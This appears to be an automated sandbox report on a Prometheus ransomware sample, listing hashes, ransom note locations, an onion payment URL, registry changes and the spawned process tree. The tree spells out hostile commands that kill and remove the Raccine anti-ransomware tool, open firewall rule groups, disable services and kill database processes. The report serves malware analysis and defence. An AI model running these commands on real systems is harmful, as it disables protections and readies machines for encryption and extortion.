Analysis
-
max time kernel
118s -
max time network
52s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
28-05-2021 06:51
Static task
static1
Behavioral task
behavioral1
Sample
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
Resource
win10v20210410
General
-
Target
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
-
Size
233KB
-
MD5
96c565af56a5ba8339f35121bf9ff196
-
SHA1
2edae92d476225b00b4a7ea1e9d7f7ccfda462cb
-
SHA256
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc
-
SHA512
6d4a3d91396bccae3dff43f6ee295980c1919a48f7914d9b8b6eca3e603aa97b8e05a0b78af27e7f1c86691fff6fc26fad69ddb774f8ed5d8011aa87b511b6c1
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
prometheus
http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
prometheus
http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM
Signatures
-
Prometheus Ransomware
Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.
-
Downloads MZ/PE file
-
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.
Processes:
description flow ioc HTTP URL 11 http://live.sysinternals.com/PsExec64.exe -
Modifies Windows Firewall 1 TTPs
-
Deletes itself 1 IoCs
Processes:
cmd.exepid Process 916 cmd.exe -
Drops startup file 1 IoCs
Processes:
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid Process 892 taskkill.exe 1248 taskkill.exe 1060 taskkill.exe 2028 taskkill.exe 284 taskkill.exe 1932 taskkill.exe 1144 taskkill.exe 1620 taskkill.exe 1964 taskkill.exe 1912 taskkill.exe 1756 taskkill.exe 756 taskkill.exe 1516 taskkill.exe 292 taskkill.exe 1432 taskkill.exe 1088 taskkill.exe 1704 taskkill.exe 1068 taskkill.exe 1012 taskkill.exe 956 taskkill.exe 1716 taskkill.exe 824 taskkill.exe 788 taskkill.exe 1596 taskkill.exe 1600 taskkill.exe 1360 taskkill.exe 436 taskkill.exe 672 taskkill.exe 1956 taskkill.exe 1612 taskkill.exe 532 taskkill.exe 1160 taskkill.exe 320 taskkill.exe 1688 taskkill.exe 776 taskkill.exe 644 taskkill.exe 860 taskkill.exe 1112 taskkill.exe 1476 taskkill.exe 1348 taskkill.exe 396 taskkill.exe 1300 taskkill.exe 572 taskkill.exe 932 taskkill.exe 992 taskkill.exe 328 taskkill.exe 1308 taskkill.exe 1540 taskkill.exe -
Processes:
mshta.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exepid Process 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exedescription pid Process Token: SeDebugPrivilege 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe Token: SeDebugPrivilege 756 taskkill.exe Token: SeDebugPrivilege 824 taskkill.exe Token: SeDebugPrivilege 1248 taskkill.exe Token: SeDebugPrivilege 788 taskkill.exe Token: SeDebugPrivilege 1964 taskkill.exe Token: SeDebugPrivilege 1596 taskkill.exe Token: SeDebugPrivilege 860 taskkill.exe Token: SeDebugPrivilege 1060 taskkill.exe Token: SeDebugPrivilege 1612 taskkill.exe Token: SeDebugPrivilege 1088 taskkill.exe Token: SeDebugPrivilege 532 taskkill.exe Token: SeDebugPrivilege 396 taskkill.exe Token: SeDebugPrivilege 1300 taskkill.exe Token: SeDebugPrivilege 1704 taskkill.exe Token: SeDebugPrivilege 1112 taskkill.exe Token: SeDebugPrivilege 1600 taskkill.exe Token: SeDebugPrivilege 2028 taskkill.exe Token: SeDebugPrivilege 1160 taskkill.exe Token: SeDebugPrivilege 284 taskkill.exe Token: SeDebugPrivilege 1068 taskkill.exe Token: SeDebugPrivilege 572 taskkill.exe Token: SeDebugPrivilege 1912 taskkill.exe Token: SeDebugPrivilege 1516 taskkill.exe Token: SeDebugPrivilege 1932 taskkill.exe Token: SeDebugPrivilege 1360 taskkill.exe Token: SeDebugPrivilege 436 taskkill.exe Token: SeDebugPrivilege 932 taskkill.exe Token: SeDebugPrivilege 672 taskkill.exe Token: SeDebugPrivilege 292 taskkill.exe Token: SeDebugPrivilege 320 taskkill.exe Token: SeDebugPrivilege 1688 taskkill.exe Token: SeDebugPrivilege 1716 taskkill.exe Token: SeDebugPrivilege 1012 taskkill.exe Token: SeDebugPrivilege 992 taskkill.exe Token: SeDebugPrivilege 1756 taskkill.exe Token: SeDebugPrivilege 328 taskkill.exe Token: SeDebugPrivilege 1144 taskkill.exe Token: SeDebugPrivilege 1308 taskkill.exe Token: SeDebugPrivilege 1476 taskkill.exe Token: SeDebugPrivilege 956 taskkill.exe Token: SeDebugPrivilege 776 taskkill.exe Token: SeDebugPrivilege 1432 taskkill.exe Token: SeDebugPrivilege 1620 taskkill.exe Token: SeDebugPrivilege 1540 taskkill.exe Token: SeDebugPrivilege 644 taskkill.exe Token: SeDebugPrivilege 892 taskkill.exe Token: SeDebugPrivilege 1956 taskkill.exe Token: SeDebugPrivilege 268 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exepid Process 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exepid Process 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exedescription pid Process procid_target PID 1084 wrote to memory of 756 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 30 PID 1084 wrote to memory of 756 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 30 PID 1084 wrote to memory of 756 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 30 PID 1084 wrote to memory of 1120 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 32 PID 1084 wrote to memory of 1120 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 32 PID 1084 wrote to memory of 1120 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 32 PID 1084 wrote to memory of 1052 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 34 PID 1084 wrote to memory of 1052 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 34 PID 1084 wrote to memory of 1052 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 34 PID 1084 wrote to memory of 980 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 36 PID 1084 wrote to memory of 980 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 36 PID 1084 wrote to memory of 980 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 36 PID 1084 wrote to memory of 864 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 38 PID 1084 wrote to memory of 864 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 38 PID 1084 wrote to memory of 864 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 38 PID 1084 wrote to memory of 652 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 39 PID 1084 wrote to memory of 652 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 39 PID 1084 wrote to memory of 652 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 39 PID 1084 wrote to memory of 544 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 40 PID 1084 wrote to memory of 544 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 40 PID 1084 wrote to memory of 544 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 40 PID 1084 wrote to memory of 704 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 44 PID 1084 wrote to memory of 704 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 44 PID 1084 wrote to memory of 704 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 44 PID 1084 wrote to memory of 1728 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 46 PID 1084 wrote to memory of 1728 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 46 PID 1084 wrote to memory of 1728 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 46 PID 1084 wrote to memory of 800 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 48 PID 1084 wrote to memory of 800 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 48 PID 1084 wrote to memory of 800 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 48 PID 1084 wrote to memory of 1616 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 50 PID 1084 wrote to memory of 1616 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 50 PID 1084 wrote to memory of 1616 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 50 PID 1084 wrote to memory of 768 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 55 PID 1084 wrote to memory of 768 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 55 PID 1084 wrote to memory of 768 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 55 PID 1084 wrote to memory of 728 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 52 PID 1084 wrote to memory of 728 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 52 PID 1084 wrote to memory of 728 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 52 PID 1084 wrote to memory of 1184 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 56 PID 1084 wrote to memory of 1184 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 56 PID 1084 wrote to memory of 1184 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 56 PID 1084 wrote to memory of 824 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 57 PID 1084 wrote to memory of 824 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 57 PID 1084 wrote to memory of 824 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 57 PID 1084 wrote to memory of 1248 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 63 PID 1084 wrote to memory of 1248 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 63 PID 1084 wrote to memory of 1248 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 63 PID 1084 wrote to memory of 788 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 61 PID 1084 wrote to memory of 788 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 61 PID 1084 wrote to memory of 788 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 61 PID 1084 wrote to memory of 1708 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 64 PID 1084 wrote to memory of 1708 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 64 PID 1084 wrote to memory of 1708 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 64 PID 1084 wrote to memory of 1964 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 65 PID 1084 wrote to memory of 1964 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 65 PID 1084 wrote to memory of 1964 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 65 PID 1084 wrote to memory of 1596 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 68 PID 1084 wrote to memory of 1596 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 68 PID 1084 wrote to memory of 1596 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 68 PID 1084 wrote to memory of 860 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 69 PID 1084 wrote to memory of 860 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 69 PID 1084 wrote to memory of 860 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 69 PID 1084 wrote to memory of 1060 1084 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe 72 -
System policy modification 1 TTPs 4 IoCs
Processes:
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe"C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe"1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1084 -
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:756
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:1120
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:1052
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:980
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:864
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:652
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:544
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:704
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:1728
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:800
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:1616
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto2⤵PID:728
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:768
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:1184
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:824
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:788
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1248
-
-
C:\Windows\system32\arp.exe"arp" -a2⤵PID:1708
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:860
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1060
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:532
-
-
